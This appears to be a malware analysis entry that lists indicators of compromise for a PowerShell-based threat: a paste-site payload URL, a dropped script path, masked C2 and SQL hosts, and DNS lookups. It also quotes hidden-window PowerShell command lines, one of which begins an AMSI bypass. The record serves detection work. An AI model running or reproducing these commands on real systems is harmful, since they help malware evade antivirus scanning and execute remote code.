Technical information
- https://textbin.net/raw/7hfwowjb0j
- C:\users\public\autosystemwindowshandler.ps1
- 'microsoft.com':80
- 'SQ#####.site4now.net':1433
- 'te##bin.net':443
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK microsoft.com
- DNS ASK SQ#####.site4now.net
- DNS ASK te##bin.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -Command [System.Type[]] $types = [Ref].Assembly.GetTypes();$amsi = $types.Where({$_.Name -like '*iUtils'});[System.Reflection.FieldInfo[]] $fields = $amsi.GetFiel...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -File C:\Users\Public\AutoSystemWindowsHandler.PS1' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -File C:\Users\Public\AutoSystemWindowsHandler.PS1